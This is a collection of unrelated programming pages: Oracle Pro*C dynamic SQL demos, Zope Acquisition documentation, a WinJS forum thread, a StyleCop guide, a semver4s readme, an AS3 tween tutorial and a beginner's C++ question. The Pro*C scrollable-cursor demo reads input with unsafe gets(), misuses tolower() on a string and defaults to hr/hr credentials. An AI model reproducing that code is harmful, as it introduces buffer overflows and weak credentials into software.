       so you need to set a maximum.  In this example, it is
       240 characters.
     */
    printf ("\n");
    for (i = 0; i < select_dp->F; i++)
    {
        char title[MAX_VNAME_LEN];

        /* Turn off high-order bit of datatype (in this example,
           it does not matter if the column is NOT NULL). */
        SQLColumnNullCheck ((unsigned short *)&(select_dp->T[i]),
                            (unsigned short *)&(select_dp->T[i]), &null_ok);

        switch (select_dp->T[i])
        {
            case  1 : /* CHAR datatype: no change in length
                         needed, except possibly for TO_CHAR
                         conversions (not handled here). */
                break;
            case  2 : /* NUMBER datatype: use SQLNumberPrecV6() to
                         extract precision and scale. */
                SQLNumberPrecV6( SQL_SINGLE_RCTX,
                    (unsigned long *)&(select_dp->L[i]),
                    &precision, &scale);
                /* Allow for maximum size of NUMBER. */
                if (precision == 0) precision = 40;
                /* Also allow for decimal point and possible sign. */
                /* convert NUMBER datatype to FLOAT if scale > 0,
                   INT otherwise. */
                if (scale > 0)
                    select_dp->L[i] = sizeof(float);
                else
                    select_dp->L[i] = sizeof(int);
                break;
            case  8 : /* LONG datatype */
                select_dp->L[i] = 240;
                break;
            case 11 : /* ROWID datatype */
                select_dp->L[i] = 18;
                break;
            case 12 : /* DATE datatype */
                select_dp->L[i] = 9;
                break;
            case 23 : /* RAW datatype */
                break;
            case 24 : /* LONG RAW datatype */
                select_dp->L[i] = 240;
                break;
        }

        /* Allocate space for the select-list data values.
           SQLSQLDAAlloc() reserves a pointer location for
           V[i] but does not allocate the full space for
           the pointer. */
        if (select_dp->T[i] != 2)
            select_dp->V[i] = (char *) realloc(select_dp->V[i],
                                               select_dp->L[i] + 1);
        else
            select_dp->V[i] = (char *) realloc(select_dp->V[i],
                                               select_dp->L[i]);

        /* Print column headings, right-justifying number
           column headings. */

        /* Copy to temporary buffer in case name is null-terminated */
        memset(title, ' ', MAX_VNAME_LEN);
        strncpy(title, select_dp->S[i], select_dp->C[i]);
        if (select_dp->T[i] == 2)
            if (scale > 0)
                printf ("%.*s ", select_dp->L[i]+3, title);
            else
                printf ("%.*s ", select_dp->L[i], title);
        else
            printf("%-.*s ", select_dp->L[i], title);

        /* Coerce ALL datatypes except for LONG RAW and NUMBER
           to character. */
        if (select_dp->T[i] != 24 && select_dp->T[i] != 2)
            select_dp->T[i] = 1;

        /* Coerce the datatypes of NUMBERs to float or int
           depending on the scale. */
        if (select_dp->T[i] == 2)
            if (scale > 0)
                select_dp->T[i] = 4;  /* float */
            else
                select_dp->T[i] = 3;  /* int */
    }
    printf ("\n\n");

    /* FETCH each row selected and print the column values. */
    EXEC SQL WHENEVER NOT FOUND GOTO end_select_loop;

    for (;;)
    {
        EXEC SQL FETCH C USING DESCRIPTOR select_dp;

        /* Since each variable returned has been coerced to a
           character string, int, or float very little processing
           is required here.  This routine just prints out the
           values on the terminal. */
        for (i = 0; i < select_dp->F; i++)
        {
            if (*select_dp->I[i] < 0)
                if (select_dp->T[i] == 4)
                    printf ("%-*c ", (int)select_dp->L[i]+3, ' ');
                else
                    printf ("%-*c ", (int)select_dp->L[i], ' ');
            else
                if (select_dp->T[i] == 3)       /* int datatype */
                    printf ("%*d ", (int)select_dp->L[i],
                            *(int *)select_dp->V[i]);
                else if (select_dp->T[i] == 4)  /* float datatype */
                    printf ("%*.2f ", (int)select_dp->L[i],
                            *(float *)select_dp->V[i]);
                else                            /* character string */
                    printf ("%-*.*s ", (int)select_dp->L[i],
                            (int)select_dp->L[i], select_dp->V[i]);
        }
        printf ("\n");
    }
end_select_loop:
    return;
}

void help()
{
    puts("\n\nEnter a SQL statement or a PL/SQL block at the SQL> prompt.");
    puts("Statements can be continued over several lines, except");
    puts("within string literals.");
    puts("Terminate a SQL statement with a semicolon.");
    puts("Terminate a PL/SQL block (which can contain embedded semicolons)");
    puts("with a slash (/).");
    puts("Typing \"exit\" (no semicolon needed) exits the program.");
    puts("You typed \"?\" or \"help\" to get this message.\n\n");
}

void sql_error()
{
    /* ORACLE error handler */
    printf ("\n\n%.70s\n", sqlca.sqlerrm.sqlerrmc);
    if (parse_flag)
        printf ("Parse error at character offset %d in SQL statement.\n",
                sqlca.sqlerrd[4]);

    EXEC SQL WHENEVER SQLERROR CONTINUE;
    EXEC SQL ROLLBACK WORK;
    longjmp(jmp_continue, 1);
}

The following demo program describes the
scrollable cursor feature applied with oracle dynamic method 4. This program is available on-line in the file scrolldemo1.pc in your demo directory.

/*
 * This demo program exhibits the scrollable cursor feature
 * used with oracle dynamic method 4. The scrollable cursor
 * feature can also be used with ANSI dynamic method 4.
 *
 * This program takes as argument the username/passwd. Once
 * logged in, it prompts for a select query. It then prompts
 * for the orientation and prints the results of the query.
 *
 * Before executing this example, make sure that the hr/hr
 * schema exists.
 */

#include <stdio.h>
#include <sqlca.h>
#include <sqlda.h>
#include <sqlcpr.h>
#include <stdlib.h>
#include <setjmp.h>

#define MAX_SELECT_ITEMS 200
#define MAX_CHARS 500

/* Maximum size of a select-list item name */
#define MAX_NAME_SIZE 50

SQLDA *selda;
SQLDA *bind_des;

jmp_buf beginEnv;
jmp_buf loopEnv;

/* Data buffer */
char c_data[MAX_SELECT_ITEMS][MAX_CHARS];

char username[60];
char stmt[500];

/* Print the generic error message & exit */
void sql_error()
{
    char msgbuf[512];
    size_t msgbuf_len, msg_len;

    msgbuf_len = sizeof(msgbuf);
    sqlglm(msgbuf, &msgbuf_len, &msg_len);
    printf ("\n\n%.*s\n", msg_len, msgbuf);

    EXEC SQL WHENEVER SQLERROR CONTINUE;
    EXEC SQL ROLLBACK WORK RELEASE;
    exit(EXIT_FAILURE);
}

/* Print the error message and continue to query the user */
void sql_loop_error()
{
    char msgbuf[512];
    size_t msgbuf_len, msg_len;
    int code = sqlca.sqlcode;

    msgbuf_len = sizeof(msgbuf);
    sqlglm(msgbuf, &msgbuf_len, &msg_len);
    printf ("\n%.*s\n", msg_len, msgbuf);
    printf("The error code is %d\n", sqlca.sqlcode);

    if (code == -900 || code == -942 || code == -904)
        longjmp(beginEnv, 1);

    longjmp(loopEnv, 1);
}

/* FETCH has returned the "no data found" error code.
   This means that either we have reached the end of the
   active set or the offset refers to a row beyond the
   active set */
void no_data_found()
{
    printf("\nNo Data available at the specified offset\n");
    longjmp(loopEnv, 1);
}

void main(int argc, char *argv[])
{
    int i, n;
    int sli;       /* select-list item */
    int offset;
    int contFlag;
    char bindVar[20];
    char *u, temp[3];
    char choice;

    /* Error Handler */
    EXEC SQL WHENEVER SQLERROR DO sql_error();

    if (argc == 1)
    {
        printf("Logging in as default user hr\n");
        strcpy(username, "hr/hr");
    }
    else
        strcpy(username, argv[1]);

    /* Establish a connection to the data base */
    EXEC SQL CONNECT :username;

    u = username;
    while (*++u != '/');
    *u = '\0';

    /* Error Handler */
    EXEC SQL WHENEVER SQLERROR DO sql_loop_error();

    for (;;)
    {
        setjmp(beginEnv);

        printf("[%s] SQL > ", username);
        gets(stmt);

        if (!strlen(stmt))
            continue;

        if (!strcmp(tolower(stmt), "exit"))
            break;

        selda = sqlald(MAX_SELECT_ITEMS, MAX_NAME_SIZE, 0);
        bind_des = sqlald(MAX_SELECT_ITEMS, MAX_NAME_SIZE, 30);

        /* prepare an sql statement for the query */
        EXEC SQL PREPARE S FROM :stmt;

        /* Declare a cursor as scrollable */
        EXEC SQL DECLARE C SCROLL CURSOR FOR S;

        for (i = 0; i < MAX_SELECT_ITEMS; i++)
        {
            bind_des->I[i] = (short *) malloc(sizeof (short));
            bind_des->V[i] = (char *) malloc(1);
        }

        bind_des->N = MAX_SELECT_ITEMS;
        EXEC SQL DESCRIBE BIND VARIABLES FOR S INTO bind_des;

        /* set up the bind variables */
        if (bind_des->F < 0)
        {
            printf("Bind descriptor, value exceeds the limit\n");
            exit(-1);
        }

        bind_des->N = bind_des->F;

        for (i = 0; i < bind_des->F; i++)
        {
            printf("Enter the value for bind variable %.*s: ",
                   (int)bind_des->C[i], bind_des->S[i]);
            fgets(bindVar, sizeof(bindVar), stdin);

            n = strlen(bindVar) - 1;
            bind_des->L[i] = n;
            bind_des->V[i] = (char *) realloc(bind_des->V[i],
                                              (bind_des->L[i] + 1));
            strncpy(bind_des->V[i], bindVar, n);

            if ((strncmp(bind_des->V[i], "NULL", 4) == 0) ||
                (strncmp(bind_des->V[i], "null", 4) == 0))
                *bind_des->I[i] = -1;
            else
                *bind_des->I[i] = 0;

            bind_des->T[i] = 1;
        }

        /* open the cursor */
        EXEC SQL OPEN C USING DESCRIPTOR bind_des;

        EXEC SQL DESCRIBE SELECT LIST FOR S INTO selda;

        if (selda->F < 0)
        {
            printf("Select descriptor, value exceeds the limit\n");
            exit(-1);
        }

        selda->N = selda->F;

        for (sli = 0; sli < selda->N; sli++)
        {
            /* Set addresses of heads of the arrays in the V element. */
            selda->V[sli] = c_data[sli];

            /* Convert everything to varchar on output. */
            selda->T[sli] = 1;

            /* Set the maximum lengths. */
            selda->L[sli] = MAX_CHARS;
        }

        while (1)
        {
            printf("\n\nEnter the row number to be fetched \n");
            printf("1.ABSOLUTE\n");
            printf("2.RELATIVE\n");
            printf("3.FIRST \n");
            printf("4.NEXT \n");
            printf("5.PREVIOUS \n");
            printf("6.LAST \n");
            printf("7.CURRENT \n");
            printf("Enter your choice --> ");
            scanf("%c", &choice);

            EXEC SQL WHENEVER NOT FOUND DO no_data_found();

            switch (choice)
            {
            case '1':
                printf("\nEnter Offset :");
                scanf("%d", &offset);
                EXEC SQL FETCH ABSOLUTE :offset C USING DESCRIPTOR selda;
                break;
            case '2':
                printf("\nEnter Offset :");
                scanf("%d", &offset);
                EXEC SQL FETCH RELATIVE :offset C USING DESCRIPTOR selda;
                break;
            case '3':
                EXEC SQL FETCH FIRST C USING DESCRIPTOR selda;
                break;
            case '4':
                EXEC SQL FETCH NEXT C USING DESCRIPTOR selda;
                break;
            case '5':
                EXEC SQL FETCH PRIOR C USING DESCRIPTOR selda;
                break;
            case '6':
                EXEC SQL FETCH LAST C USING DESCRIPTOR selda;
                break;
            case '7':
                EXEC SQL FETCH CURRENT C USING DESCRIPTOR selda;
                break;
            default:
                printf("Invalid choice\n");
                continue;
            }

            /* print the row */
            for (sli = 0; sli < selda->N; sli++)
                printf("%.10s ", c_data[sli]);
            puts("");

            setjmp(loopEnv);

            contFlag = 'x';
            while (contFlag != 'Y' && contFlag != 'N')
            {
                printf("\nContinue with the current fetch? [y/n] : ");
                contFlag = toupper(getchar());
            }

            if (contFlag != 'Y')
                break;
        }

        EXEC SQL CLOSE C;
    }

    EXEC SQL ROLLBACK RELEASE;
    exit(EXIT_SUCCESS);
}
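Pro*C and the SQLDA are Oracle-specific, but the shape of Method 4 — prepare a statement whose text only arrives at run time, discover its bind variables and select-list columns, then fetch — exists in most database APIs. As a rough, non-Oracle sketch, Python's built-in sqlite3 module can illustrate the same flow; the table and data below are invented for the example:

```python
import sqlite3

# The core of "Method 4": the SQL text is not known until run time,
# so the program must discover the shape of the result set itself.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE emp (empno INTEGER, ename TEXT, deptno INTEGER)")
conn.executemany("INSERT INTO emp VALUES (?, ?, ?)",
                 [(1014, "ALLISON", 30), (1015, "TRUSDALE", 30),
                  (1016, "FRAZIER", 10)])

stmt = "SELECT empno, ename FROM emp WHERE deptno = ?"  # arrives at run time
cur = conn.execute(stmt, (30,))                         # prepare + bind + open

# cursor.description plays the role of the select descriptor (SQLDA):
# only after execution do we learn what columns the query produced.
columns = [d[0] for d in cur.description]
rows = cur.fetchall()                                   # the FETCH loop

print(columns)  # ['empno', 'ename']
print(rows)     # [(1014, 'ALLISON'), (1015, 'TRUSDALE')]
```

Unlike the SQLDA, sqlite3 handles type coercion and buffer allocation itself, which is why the Python version needs no equivalent of process_select_list().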
http://docs.oracle.com/cd/B14117_01/appdev.101/a97269/pc_15ody.htm
Acquisition

Acquisition [1] is a mechanism that allows objects to obtain attributes from their environment. It is similar to inheritance, except that, rather than traversing an inheritance hierarchy to obtain attributes, a containment hierarchy is traversed.

The "ExtensionClass":ExtensionClass.html release includes mix-in extension base classes that can be used to add acquisition as a feature to extension subclasses. These mix-in classes use the context-wrapping feature of ExtensionClasses to implement acquisition.

Consider the following example::

  import ExtensionClass, Acquisition

  class C(ExtensionClass.Base):
    color='red'

  class A(Acquisition.Implicit):

    def report(self):
      print self.color

  a=A()
  c=C()
  c.a=a

  d=C()
  d.color='green'
  d.a=a

  c.a.report() # prints 'red'
  d.a.report() # prints 'green'
  a.report()   # raises an attribute error

The class 'A' inherits acquisition behavior from 'Acquisition.Implicit'. The object, 'a', "has" the color of objects 'c' and 'd' when it is accessed through them, but it has no color by itself. The object 'a' obtains attributes from its environment, where its environment is defined by the access path used to obtain 'a'.

Acquisition wrappers provide access to the wrapped objects through the attributes 'aq_parent', 'aq_self', and 'aq_base'. In the example above, the expressions::

  c.a.aq_parent is c

and::

  c.a.aq_self is a

both evaluate to true, but the expression::

  c.a is a

evaluates to false, because the expression 'c.a' evaluates to an acquisition wrapper around 'c' and 'a', not 'a' itself.

The attribute 'aq_base' is similar to 'aq_self'. Wrappers may be nested and 'aq_self' may be a wrapped object. The 'aq_base' attribute is the underlying object with all wrappers removed.

Acquisition Control

Two styles of acquisition are supported in the current ExtensionClass release, implicit and explicit acquisition.

Implicit acquisition

Implicit acquisition is so named because it searches for attributes from the environment automatically whenever an attribute cannot be obtained directly from an object or through inheritance. An attribute may be implicitly acquired if its name does not begin with an underscore, '_'.

To support implicit acquisition, an object should inherit from the mix-in class 'Acquisition.Implicit'.
Explicit Acquisition

When explicit acquisition is used, attributes are not automatically obtained from the environment. Instead, the method 'aq_acquire' must be used, as in::

  print c.a.aq_acquire('color')

To support explicit acquisition, an object should inherit from the mix-in class 'Acquisition.Explicit'.

Controlled Acquisition

A class (or instance) can provide attribute by attribute control over acquisition. This is done by:

- subclassing from 'Acquisition.Explicit', and

- setting all attributes that should be acquired to the special value 'Acquisition.Acquired'. Setting an attribute to this value also allows inherited attributes to be overridden with acquired ones.

For example, in::

  class C(Acquisition.Explicit):
     id=1
     secret=2
     color=Acquisition.Acquired
     __roles__=Acquisition.Acquired

the *only* attributes that are automatically acquired from containing objects are 'color' and '__roles__'. Note also that the '__roles__' attribute is acquired even though its name begins with an underscore. In fact, the special 'Acquisition.Acquired' value can be used in 'Acquisition.Implicit' objects to implicitly acquire selected objects that smell like private objects.

Filtered Acquisition

The 'aq_acquire' method accepts an optional "filtering" function that is used when considering whether to acquire an object, plus optional extra data that is passed to the filter. The filter is called with the object that 'aq_acquire' was called on, the object where an attribute was found, the name of the attribute, the attribute value, and the extra data. If the filter returns a true value, the attribute found is returned; otherwise, the acquisition search continues. Consider the following example::

  from Acquisition import Explicit

  class HandyForTesting:
      def __init__(self, name): self.name=name
      def __str__(self):
        return "%s(%s)" % (self.name, self.__class__.__name__)
      __repr__=__str__

  class E(Explicit, HandyForTesting): pass

  class Nice(HandyForTesting):
      isNice=1
      def __str__(self):
        return HandyForTesting.__str__(self)+' and I am nice!'
      __repr__=__str__

  a=E('a')
  a.b=E('b')
  a.b.c=E('c')
  a.p=Nice('spam')
  a.b.p=E('p')

  def find_nice(self, ancestor, name, object, extra):
      return hasattr(object,'isNice') and object.isNice

  print a.b.c.aq_acquire('p', find_nice)

The filtered acquisition in the last line skips over the first attribute it finds with the name 'p', because the attribute doesn't satisfy the condition given in the filter. The output of the last line is::

  spam(Nice) and I am nice!

Acquisition and methods

Python methods of objects that support acquisition can use acquired attributes, as in the 'report' method of the first example above.

Acquiring Acquiring objects

Consider the following example::

  from Acquisition import Implicit

  class C(Implicit):
      def __init__(self, name): self.name=name
      def __str__(self):
        return "%s(%s)" % (self.name, self.__class__.__name__)
      __repr__=__str__

  a=C("a")
  a.b=C("b")
  a.b.pref="spam"
  a.b.c=C("c")
  a.b.c.color="red"
  a.b.c.pref="eggs"
  a.x=C("x")

  o=a.b.c.x

The expression 'o.color' might be expected to return '"red"'. In earlier versions of ExtensionClass, however, this expression failed.
Acquired acquiring objects did not acquire from the environment they were accessed in, because objects were only wrapped when they were first found, and were not rewrapped as they were passed down the acquisition tree.

In the current release of ExtensionClass, the expression 'o.color' does indeed return '"red"'. When searching for an attribute in 'o', objects are searched in the order 'x', 'a', 'b', 'c'. So, for example, the expression 'o.pref' returns '"spam"', not '"eggs"'. In earlier releases of ExtensionClass, the attempt to get the 'pref' attribute from 'o' would have failed.

If desired, the current rules for looking up attributes in complex expressions can best be understood through repeated application of the '__of__' method:

  'a.x'     -- 'x.__of__(a)'

  'a.b'     -- 'b.__of__(a)'

  'a.b.x'   -- 'x.__of__(a).__of__(b.__of__(a))'

  'a.b.c'   -- 'c.__of__(b.__of__(a))'

  'a.b.c.x' -- 'x.__of__(a).__of__(b.__of__(a)).__of__(c.__of__(b.__of__(a)))'

and by keeping in mind that attribute lookup in a wrapper is done by trying to look up the attribute in the wrapped object first and then in the parent object. In the expressions above involving the '__of__' method, lookup proceeds from left to right.

Note that heuristics are used to avoid most of the repeated lookups. For example, in the expression 'a.b.c.x.foo', the object 'a' is searched no more than once, even though it is wrapped three times.

.. [1] Gil, J., Lorenz, D., "Environmental Acquisition--A New Inheritance-Like Abstraction Mechanism", OOPSLA '96 Proceedings, ACM SIG-PLAN, October, 1996
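The wrapper behaviour described above can be sketched in a few lines of plain Python. This is a toy reimplementation for illustration only — the real acquisition wrappers are C extension types, and the 'Wrapper' class below is an invented name, not part of the ExtensionClass API:

```python
class Wrapper:
    """Toy acquisition wrapper: attribute lookup tries the wrapped
    object (aq_self) first, then falls back to the parent (aq_parent),
    i.e. the context the object was reached through."""
    def __init__(self, obj, parent):
        self.aq_self = obj
        self.aq_parent = parent

    def __getattr__(self, name):
        # Only called when normal lookup fails, so aq_self/aq_parent
        # (stored in the instance dict) never recurse through here.
        try:
            return getattr(self.aq_self, name)
        except AttributeError:
            return getattr(self.aq_parent, name)


class Implicit:
    def __of__(self, parent):
        return Wrapper(self, parent)


class C(Implicit):
    def __init__(self, name):
        self.name = name


a = C("a")
c = C("c")
c.color = "red"

wrapped = a.__of__(c)   # roughly what the expression c.a evaluates to
print(wrapped.color)                                    # red
print(wrapped.aq_parent is c and wrapped.aq_self is a)  # True
```

The real implementation also rewraps objects as they are passed down the access path (which is exactly what the repeated '__of__' applications above describe); this sketch only shows a single level of wrapping.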
https://sources.debian.org/src/python-extclass/1.2-1/Acquisition.stx/
Asked by: Win2JS.ui-light.css, input buttons, viewbox confusion

I was recently given some help with a memory game app I am developing. I could not get scrolling to work, so WinJS ui-light.css was disabled. A new class, win-scrollview, was added to the outerdeck div. I have since managed to get all the content on the page, so I re-enabled ui-light.css and removed the win-scrollview class from the HTML. I wanted to use viewbox to help responsiveness (orientation, snap) during the game itself.

The choice of settings is through a separate div, and is chosen with buttons. If I have ui-light.css enabled and viewbox, then there is no functionality in the buttons. The buttons work with either one but not both. When I click a button nothing happens. It does not feed through to the associated event handler (I tried setting a breakpoint at the start of the event handler, but the program did not reach it). I am wondering where I have gone wrong.

The relevant HTML is:

<!-- WinJS references -->
<link href="//Microsoft.WinJS.2.0/css/ui-light.css" rel="stylesheet" />
<script src="//Microsoft.WinJS.2.0/js/base.js"></script>
<script src="//Microsoft.WinJS.2.0/js/ui.js"></script>

<body>
  <div id="settings">
    <div id="difficulty">
      <ul>
        <li><input type="button" id="easymatch" class="button" name="Match" value="Easy Match Game" /></li>
        <li><input type="button" id="easymemory" class="button" value="Easy Memory Game" /></li>
        and so on .....
      </ul>
    </div>
  </div>
  <div data-
    The game is played here.
    <div id="outerdeck">
    </div>
  </div>

The relevant JavaScript:

}
var promise = WinJS.UI.processAll();
promise.then(
    function () {
        // this code runs when the application has started.
        initialiseHtmlElements();
    });
args.setPromise(promise);

var easyMatchButton = document.getElementById("easymatch");
easyMatchButton.addEventListener("click", memory.bind({ SA: SettingsArray[0] }), false);

and so on.

Thank you for your help.

Tuesday, May 20, 2014 3:22 PM

Question

All replies

I tested your code and had to make the following changes:

1) Commented out initialiseHtmlElements();

2) Replaced

easyMatchButton.addEventListener("click", memory.bind({ SA: SettingsArray[0] }), false);

with

easyMatchButton.addEventListener("click", DoSomething, false);

and

function DoSomething() {
    var MyDialog = new Windows.UI.Popups.MessageDialog("hello!");
    MyDialog.showAsync();
}

The button click worked fine. Am I missing something?

Wednesday, May 21, 2014 1:47 PM
Moderator

Many thanks for your help. Much appreciated.

The initialise function was added to keep several variables like

var aname = document.getElementById("something");

current during the running of the game. They were going out of scope each time a function was called, even if they were declared at the top as

var aname = document.getElementById("something");

Perhaps a namespace might have done the trick? (I am still a bit wobbly on namespaces.)

The call

easyMatchButton.addEventListener("click", memory.bind({ SA: SettingsArray[0] }), false);

feeds settings to the game. The settings array gives the number of cards, the number of copies, and whether it is the match or memory version, and makes it easy to alter the various game levels. These settings can then be fed into the game function directly. Does that mean that, to get rid of the bind({ SA: SettingsArray[0] }), I would need to add a dozen functions in place of a single array?

I have since altered the code to:

args.setPromise(WinJS.UI.processAll().then(function completed() {
    // this code runs when the application has started.
    initialiseHtmlElements();
    var easyMatchButton = document.getElementById("easymatch");
    easyMatchButton.addEventListener("click", memory.bind({ SA: SettingsArray[0] }), false);
    var easyMemoryButton = document.getElementById("easymemory");
    easyMemoryButton.addEventListener("click", memory.bind({ SA: SettingsArray[1] }), false);

etc.

The HTML: I have ui-light.css enabled, but have no viewport. The buttons work. I have written an algorithm which resizes the images for the game based on the number of cards and the size of the screen. Everything fits in the screen, including in the simulator screens. On the simulator the game responds well to rotation. However, on my hybrid laptop the game does not respond when rotated. (Normally the window rotates with ease.) I am not sure why this is. Do I believe the simulator or my laptop?

I am wondering if there is any alternative to viewport for orientation, or if I need to write that in myself. Interestingly, when trying out other WinJS alternatives for the outerdeck div, I found that some did not block the buttons but some did. I do not understand why

easyMatchButton.addEventListener("click", memory.bind({ SA: SettingsArray[0] }), false)

should stop the buttons working with the viewport. Is there any reason why it should? That might help me work round it (and understand the workings of an app more thoroughly).

Thanking you in advance for your help.

Thursday, May 22, 2014 7:24 AM
https://social.msdn.microsoft.com/Forums/en-US/8c9259d8-ebfa-4786-ad9d-abb6d0e0a186/win2jsuilightcss-input-buttons-viewbox-confusion?forum=winappswithhtml5
Programmer, Architect, Teacher

Do you have any coding standards for your projects? Microsoft defines C# coding conventions, and they can be a starting point. There are many reasons why it is important to apply coding standards to your project:

- The same rules for writing code improve software readability by allowing developers to understand new code faster and better.
- The codebase is almost never fully supported by its original author. Most of the total cost of software is spent on its maintenance.
- It helps to demonstrate best practices.
- Like any other product, software must be "well packaged" and clean.

StyleCop is the de facto standard tool for .NET. It analyzes C# source code to enforce a set of style and consistency rules. The default rule set can be used, or you can configure your own. The nice thing is that warnings and errors are shown in the IDE during compilation. StyleCop was introduced in 2008 and is now available in two options: the StyleCop Visual Studio extension and the StyleCop NuGet package. The NuGet package is the most convenient way to use StyleCop, since it does not require any additional configuration of the IDE. That is great when working in a team. Also, if you use an IDE other than Visual Studio (e.g., JetBrains Rider on Mac), it will do the job perfectly. So let's dive in.

StyleCop Installation

As described above, the NuGet package is the best way to use StyleCop. To add the StyleCop NuGet package to your project, run the following command:

Install-Package StyleCop.Analyzers

The NuGet package manager can also be used to find and install the StyleCop NuGet package directly in the IDE. After the installation, you can compile your project and see if there are any errors or warnings in the output bar. For a simple Hello World console application, you could see something like this:

Build started 01/03/2022 23:33:44.
"/ConsoleApp1/ConsoleApp1.csproj" (build target) (1) ->
(CoreCompile target) ->
/ConsoleApp1/Program.cs(1,1): warning SA1633: The file header is missing or not located at the top of the file.
/ConsoleApp1/Program.cs(5,11): warning SA1400: Element 'Program' should declare an access modifier
/ConsoleApp1/Program.cs(1,1): warning SA1200: Using directive should appear within a namespace declaration
/ConsoleApp1/Program.cs(6,6): warning SA1028: Code should not contain trailing whitespace
CSC : warning SA0001: XML comment analysis is disabled due to project configuration

5 Warning(s)
0 Error(s)

Time Elapsed 00:00:01.35

When the StyleCop NuGet package is installed, the default rule set is applied. Most likely, your team would like a custom rule set that matches the code styles and conventions defined in your team or organization.

Custom Ruleset

A *.ruleset file is an XML file that provides the following features:

- Enable and disable individual rules
- Configure the severity of violations reported by individual rules

I recommend downloading the default ruleset and modifying it according to your needs. There is a complete specification of the rules here. To plug a custom ruleset into your project, add the *.ruleset file to your project and modify the csproj file by adding a CodeAnalysisRuleSet tag as follows:

<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    ...
    <CodeAnalysisRuleSet>settings.ruleset</CodeAnalysisRuleSet>
  </PropertyGroup>
  ...
</Project>

Configuring StyleCop

Another way to configure StyleCop is to add a stylecop.json file to the project.
It provides the following options:

- Specify project-specific text, such as the name of the company and the structure to use for copyright headers
- Fine-tune the behavior of certain rules

For example, to set the number of columns to use for each indentation level to 4 and to indent with spaces, do the following:

{
  "settings": {
    "indentation": {
      "indentationSize": 4,
      "useTabs": false
    }
  }
}

Summary

StyleCop analyzes C# source code to enforce a set of style and consistency rules. Use it as a NuGet package, which is the best way to work in a team. Use custom *.ruleset and stylecop.json files to tune StyleCop according to your project's needs.
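For completeness, the company-name and copyright-header settings mentioned above can also be sketched in stylecop.json. This is a hedged example: "ExampleCorp" is a placeholder, and the keys follow the documented StyleCop.Analyzers settings schema (the {companyName} token is substituted into the copyright text).

```json
{
  "settings": {
    "documentationRules": {
      "companyName": "ExampleCorp",
      "copyrightText": "Copyright (c) {companyName}. All rights reserved."
    }
  }
}
```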
https://hackernoon.com/stylecop-for-net-makes-code-better
Semver4s

Parse SemVer, NPM-style SemVer ranges, and check whether some version matches some range.

Features

Parsers for semver:

import semver4s._

for {
  version <- parseVersion("1.2.3")
  matcher <- parseMatcher("~1.2")
} yield matcher.matches(version)

Short unsafe versions are available too, which are convenient in, for example, sbt files:

import semver4s.unsafe._

"1.2.3".satisfies(">=1.2 <2")

Support for literal versions and matchers with the v and m interpolators, checked at compile time:

import semver4s.Literal._

m"~1.2".matches(v"1.2.3")

Supports all npm version ranges as matchers.

Odds and ends include getting upper and lower bounds for matchers and incrementing versions.
https://index.scala-lang.org/martijnhoekstra/semver4s/semver4s/0.0.1?target=_2.12
Sequential movie clip delay in AS3

In this quick tip I will show you three ways of sequentially delaying movie clip animation using ActionScript 3. You will need the TweenNano class, which can be downloaded from greensock.com. My examples assume you have four movie clips on the stage with the instance names mc1, mc2, mc3 and mc4.

In the first example I have used the Timer class with a delay of one second and a repeat count of four. This creates four one-second delays. Every time the moveCircles function is called, the counter increments and each movie clip moves to 50 pixels on the y axis after a one-second delay.

import com.greensock.TweenNano;

var counter:Number = -1;
var mcArray:Array = [mc1, mc2, mc3, mc4];
var myDelay:Timer = new Timer(1000, mcArray.length);
myDelay.addEventListener(TimerEvent.TIMER, moveCircles);
myDelay.start();

function moveCircles(event:TimerEvent):void {
    counter++;
    TweenNano.to(mcArray[counter], 2, {y:50});
}

The second example uses the delay property of the TweenNano class as an alternative to using the Timer class. I have put the TweenNano.to() method inside a for loop which sets a delay for each of the movie clips.

import com.greensock.TweenNano;

var mcArray:Array = [mc1, mc2, mc3, mc4];
var len:uint = mcArray.length;

for(var i:uint = 0; i < len; i++){
    TweenNano.to(mcArray[i], 2, {y: 50, delay: i * 2});
}

The third example uses the onComplete property of the TweenNano class to call the playNextBall function. The playNextBall function increments the counter and calls the startBall function if the current count is less than the number of items in the array.

import com.greensock.TweenNano;

var mcArray:Array = [mc1, mc2, mc3, mc4];
var counter:uint = 0;

function startBall():void{
    TweenNano.to(mcArray[counter], 2, {y: 50, onComplete:playNextBall});
}

function playNextBall():void{
    if(counter != mcArray.length-1){
        counter++;
        startBall();
    }
}

startBall();

The three examples above all delay the movement of the y position.
The same code can be used to delay the other properties of the movie clip, such as the x, rotation, height, etc. I have delayed the alpha property in the example below.

import com.greensock.TweenNano;

var mcArray:Array = [mc1, mc2, mc3, mc4];
var len:uint = mcArray.length;

for(var i:uint = 0; i < len; i++){
    mcArray[i].alpha = 0;
    TweenNano.to(mcArray[i], 2, {alpha: 1, delay: i * 2});
}

You can also use TweenMax's allFrom method to achieve the same effect, although this method uses slightly more memory.

import com.greensock.TweenMax;

var mcArray:Array = [mc1, mc2, mc3];
TweenMax.allFrom(mcArray, 0.5, {alpha:0}, 0.5);

Related tutorials:
Time delay in Actionscript 3
Delay function in Actionscript 3

2 comments:

Hi. This is a great little tidbit! I was wondering how you managed to create the reset button. I've used your technique in an extended fashion on a grid of 10x10 movie clips (100 movie clips, that is, not 10x10 pixels) and the sequence works well, but I can't reset it with the code that I have.

@markerlineable, can you post the reset code you are using?
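As an aside for readers outside Flash, the staggered-delay pattern from the tutorial (each clip starting i * delay after the first) can be sketched in plain JavaScript. The names and values here are invented for illustration; the function computes the stagger schedule rather than scheduling timers, so the logic itself is easy to inspect.

```javascript
// Each item starts its "tween" i * delayMs after the first one.
function staggerDelays(items, delayMs) {
    // Returns [{ item, startAt }] instead of calling setTimeout directly.
    return items.map(function (item, i) {
        return { item: item, startAt: i * delayMs };
    });
}

var schedule = staggerDelays(["mc1", "mc2", "mc3", "mc4"], 2000);
// schedule[2] is { item: "mc3", startAt: 4000 }
```

In a real page each entry would be handed to setTimeout (or a tween library's delay option), which is exactly what TweenNano's delay property does internally for the AS3 examples above.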
http://www.ilike2flash.com/2011/07/sequential-movie-clip-delay-in-as3.html
Hi Guys! I'm new to C++ but have made a few programs. I am currently making a memory testing game. It was all working well until I started using an array to generate random numbers. If the code is too difficult to understand I'll annotate it, but other than that, can anyone help me? Here is the code (it's not finished yet):

#include <cstdlib>
#include <iostream>
#include <dos.h>
#include <windows.h>
#include <stdlib.h>
#include <conio.h>

using namespace std;

int main()
{
    int numberarray[20];
    int numberarrayplace;
    cout<<"Welcome to Dave's memory lab! \n";
    cout<<"Here we will carry out a test: \n";
    cout<<"Remember the numbers!";
